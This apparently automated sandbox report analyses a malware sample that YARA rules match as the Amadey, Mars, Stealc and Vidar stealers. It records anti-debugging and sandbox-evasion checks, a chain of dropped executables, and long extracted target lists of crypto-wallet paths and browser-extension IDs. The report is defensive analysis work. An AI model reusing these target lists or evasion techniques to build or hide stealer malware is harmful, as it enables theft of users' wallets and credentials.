Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Code function: 8_2_04C10EC9 Start: 04C10F5C End: 04C10EE5 8_2_04C10EC9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_051404E7 Start: 0514052D End: 0514051E 10_2_051404E7
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Code function: 8_2_04C10D9B rdtsc 8_2_04C10D9B
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA15FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CA15FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C9B3480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DD643B mov eax, dword ptr fs:[00000030h] 10_2_00DD643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00DDA1A2 mov eax, dword ptr fs:[00000030h] 10_2_00DDA1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C9EB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C9EB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB341 cpuid 0_2_6C9EB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C9B35A0
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Code function: 12_2_7F601A10 GetUserNameA, 12_2_7F601A10
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 10.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.HCGCBFHCFC.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorti.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.3863894754.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2659626810.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3262726628.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4551252479.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2280009907.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.4421982821.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2619135843.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2321726856.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.3823052795.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2322415423.00000000007C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.3222116129.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2370682465.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2329883407.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4462261068.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a62ee169b8.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.a62ee169b8.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2395229335.0000000000901000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2271711490.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2104, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ineer\AppData\Roaming\\Exodus\\window-state.json7T
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: file.exe, 00000000.00000002.2271135677.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo 